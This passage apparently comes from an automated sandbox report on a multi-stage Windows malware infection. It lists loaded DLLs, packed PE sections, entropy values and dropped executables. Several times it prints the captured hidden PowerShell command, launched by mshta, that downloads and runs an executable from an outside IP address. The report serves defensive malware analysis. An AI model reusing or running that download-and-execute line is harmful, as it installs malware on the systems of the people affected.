                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeSection loaded: wtsapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeSection loaded: netapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: webio.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\spoolsv.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\spoolsv.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\spoolsv.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\spoolsv.exeSection loaded: ualapi.dll
                      Source: C:\Windows\System32\spoolsv.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\spoolsv.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\spoolsv.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\spoolsv.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\spoolsv.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\spoolsv.exeSection loaded: wtsapi32.dll
                      Source: C:\Windows\System32\spoolsv.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\spoolsv.exeSection loaded: netapi32.dll
                      Source: C:\Windows\System32\spoolsv.exeSection loaded: version.dll
                      Source: C:\Windows\System32\spoolsv.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Binary string: lib.pdb source: powershell.exe, 0000000F.00000002.1055301603.0000024DF86CE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: bpdbtem.pdb source: powershell.exe, 0000000F.00000002.1055301603.0000024DF86CE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: re.pdb; source: powershell.exe, 0000000F.00000002.1055301603.0000024DF86CE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: lib.pdb6 source: powershell.exe, 0000000F.00000002.1055301603.0000024DF86CE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: ab5415a7b5.exe, 00000035.00000003.1955416141.00000000049B0000.00000004.00001000.00020000.00000000.sdmp, ab5415a7b5.exe, 00000035.00000002.2093414321.0000000000D12000.00000040.00000001.01000000.00000017.sdmp

                      Data Obfuscation

                      barindex
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeUnpacked PE file: 17.2.483d2fa8a0d53818306efeb32d3.exe.300000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rrnnqshc:EW;joxwbcxj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rrnnqshc:EW;joxwbcxj:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeUnpacked PE file: 18.2.483d2fa8a0d53818306efeb32d3.exe.300000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rrnnqshc:EW;joxwbcxj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rrnnqshc:EW;joxwbcxj:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeUnpacked PE file: 19.2.rapes.exe.430000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rrnnqshc:EW;joxwbcxj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rrnnqshc:EW;joxwbcxj:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeUnpacked PE file: 20.2.rapes.exe.430000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rrnnqshc:EW;joxwbcxj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rrnnqshc:EW;joxwbcxj:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeUnpacked PE file: 28.2.rapes.exe.430000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rrnnqshc:EW;joxwbcxj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rrnnqshc:EW;joxwbcxj:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeUnpacked PE file: 33.2.bb5ad48269.exe.ec0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zwvttbmt:EW;qrioviwp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zwvttbmt:EW;qrioviwp:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeUnpacked PE file: 35.2.19be97887a.exe.e20000.0.unpack :EW;.rsrc:W;.idata :W;wpdhoglv:EW;sxpkxloz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;wpdhoglv:EW;sxpkxloz:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeUnpacked PE file: 54.2.bb5ad48269.exe.ec0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zwvttbmt:EW;qrioviwp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zwvttbmt:EW;qrioviwp:EW;.taggant:EW;
                      Suspicious powershell command line found
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_009042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,34_2_009042DE
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                      Source: 2qv26zF[1].exe.28.drStatic PE information: real checksum: 0x0 should be: 0xe49e5
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.drStatic PE information: real checksum: 0x1dca59 should be: 0x1d42c7
                      Source: D51OAO8D0TVNMCQXHC.exe.30.drStatic PE information: real checksum: 0x1d326a should be: 0x1d7500
                      Source: random[1].exe2.28.drStatic PE information: real checksum: 0x2aa5f1 should be: 0x2a7431
                      Source: ab5415a7b5.exe.28.drStatic PE information: real checksum: 0x2aa5f1 should be: 0x2a7431
                      Source: 19be97887a.exe.28.drStatic PE information: real checksum: 0x3269e8 should be: 0x320a82
                      Source: 2qv26zF.exe.28.drStatic PE information: real checksum: 0x0 should be: 0xe49e5
                      Source: 60eb3ded99.exe.28.drStatic PE information: real checksum: 0x2d43aa should be: 0x2d183f
                      Source: random[1].exe.28.drStatic PE information: real checksum: 0x3269e8 should be: 0x320a82
                      Source: rapes.exe.17.drStatic PE information: real checksum: 0x1dca59 should be: 0x1d42c7
                      Source: random[1].exe0.28.drStatic PE information: real checksum: 0x1b6030 should be: 0x1af04e
                      Source: bb5ad48269.exe.28.drStatic PE information: real checksum: 0x1b6030 should be: 0x1af04e
                      Source: random[2].exe0.28.drStatic PE information: real checksum: 0x2d43aa should be: 0x2d183f
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.drStatic PE information: section name:
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.drStatic PE information: section name: .idata
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.drStatic PE information: section name:
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.drStatic PE information: section name: rrnnqshc
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.drStatic PE information: section name: joxwbcxj
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.drStatic PE information: section name: .taggant
                      Source: rapes.exe.17.drStatic PE information: section name:
                      Source: rapes.exe.17.drStatic PE information: section name: .idata
                      Source: rapes.exe.17.drStatic PE information: section name:
                      Source: rapes.exe.17.drStatic PE information: section name: rrnnqshc
                      Source: rapes.exe.17.drStatic PE information: section name: joxwbcxj
                      Source: rapes.exe.17.drStatic PE information: section name: .taggant
                      Source: random[1].exe.28.drStatic PE information: section name:
                      Source: random[1].exe.28.drStatic PE information: section name: .idata
                      Source: random[1].exe.28.drStatic PE information: section name: wpdhoglv
                      Source: random[1].exe.28.drStatic PE information: section name: sxpkxloz
                      Source: random[1].exe.28.drStatic PE information: section name: .taggant
                      Source: 19be97887a.exe.28.drStatic PE information: section name:
                      Source: 19be97887a.exe.28.drStatic PE information: section name: .idata
                      Source: 19be97887a.exe.28.drStatic PE information: section name: wpdhoglv
                      Source: 19be97887a.exe.28.drStatic PE information: section name: sxpkxloz
                      Source: 19be97887a.exe.28.drStatic PE information: section name: .taggant
                      Source: random[1].exe0.28.drStatic PE information: section name:
                      Source: random[1].exe0.28.drStatic PE information: section name: .idata
                      Source: random[1].exe0.28.drStatic PE information: section name:
                      Source: random[1].exe0.28.drStatic PE information: section name: zwvttbmt
                      Source: random[1].exe0.28.drStatic PE information: section name: qrioviwp
                      Source: random[1].exe0.28.drStatic PE information: section name: .taggant
                      Source: bb5ad48269.exe.28.drStatic PE information: section name:
                      Source: bb5ad48269.exe.28.drStatic PE information: section name: .idata
                      Source: bb5ad48269.exe.28.drStatic PE information: section name:
                      Source: bb5ad48269.exe.28.drStatic PE information: section name: zwvttbmt
                      Source: bb5ad48269.exe.28.drStatic PE information: section name: qrioviwp
                      Source: bb5ad48269.exe.28.drStatic PE information: section name: .taggant
                      Source: random[1].exe2.28.drStatic PE information: section name:
                      Source: random[1].exe2.28.drStatic PE information: section name: .idata
                      Source: random[1].exe2.28.drStatic PE information: section name: awtxvwji
                      Source: random[1].exe2.28.drStatic PE information: section name: vgzlruyg
                      Source: random[1].exe2.28.drStatic PE information: section name: .taggant
                      Source: ab5415a7b5.exe.28.drStatic PE information: section name:
                      Source: ab5415a7b5.exe.28.drStatic PE information: section name: .idata
                      Source: ab5415a7b5.exe.28.drStatic PE information: section name: awtxvwji
                      Source: ab5415a7b5.exe.28.drStatic PE information: section name: vgzlruyg
                      Source: ab5415a7b5.exe.28.drStatic PE information: section name: .taggant
                      Source: random[2].exe0.28.drStatic PE information: section name:
                      Source: random[2].exe0.28.drStatic PE information: section name: .idata
                      Source: random[2].exe0.28.drStatic PE information: section name: szulyqbn
                      Source: random[2].exe0.28.drStatic PE information: section name: vcufrmmi
                      Source: random[2].exe0.28.drStatic PE information: section name: .taggant
                      Source: 60eb3ded99.exe.28.drStatic PE information: section name:
                      Source: 60eb3ded99.exe.28.drStatic PE information: section name: .idata
                      Source: 60eb3ded99.exe.28.drStatic PE information: section name: szulyqbn
                      Source: 60eb3ded99.exe.28.drStatic PE information: section name: vcufrmmi
                      Source: 60eb3ded99.exe.28.drStatic PE information: section name: .taggant
                      Source: D51OAO8D0TVNMCQXHC.exe.30.drStatic PE information: section name:
                      Source: D51OAO8D0TVNMCQXHC.exe.30.drStatic PE information: section name: .idata
                      Source: D51OAO8D0TVNMCQXHC.exe.30.drStatic PE information: section name:
                      Source: D51OAO8D0TVNMCQXHC.exe.30.drStatic PE information: section name: boxephyl
                      Source: D51OAO8D0TVNMCQXHC.exe.30.drStatic PE information: section name: tkoucrpj
                      Source: D51OAO8D0TVNMCQXHC.exe.30.drStatic PE information: section name: .taggant
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF9365E00BD pushad ; iretd 12_2_00007FF9365E00C1
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 28_2_00459FC1 push ecx; ret 28_2_00459FD4
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00920A76 push ecx; ret 34_2_00920A89
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.drStatic PE information: section name: entropy: 7.985810543604375
                      Source: 483d2fa8a0d53818306efeb32d3.exe.12.drStatic PE information: section name: rrnnqshc entropy: 7.954067417617069
                      Source: rapes.exe.17.drStatic PE information: section name: entropy: 7.985810543604375
                      Source: rapes.exe.17.drStatic PE information: section name: rrnnqshc entropy: 7.954067417617069
                      Source: random[1].exe.28.drStatic PE information: section name: entropy: 7.183955065223692
                      Source: 19be97887a.exe.28.drStatic PE information: section name: entropy: 7.183955065223692
                      Source: random[1].exe0.28.drStatic PE information: section name: zwvttbmt entropy: 7.954254378247319
                      Source: bb5ad48269.exe.28.drStatic PE information: section name: zwvttbmt entropy: 7.954254378247319
                      Source: random[1].exe2.28.drStatic PE information: section name: entropy: 7.802895856876273
                      Source: ab5415a7b5.exe.28.drStatic PE information: section name: entropy: 7.802895856876273
                      Source: random[2].exe0.28.drStatic PE information: section name: entropy: 7.980340550228604
                      Source: 60eb3ded99.exe.28.drStatic PE information: section name: entropy: 7.980340550228604
                      Source: D51OAO8D0TVNMCQXHC.exe.30.drStatic PE information: section name: entropy: 7.97204148426787
                      Source: D51OAO8D0TVNMCQXHC.exe.30.drStatic PE information: section name: boxephyl entropy: 7.954461811845

                      Persistence and Installation Behavior

                      barindex
                      Tries to download and execute files (via powershell)
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exeJump to dropped file
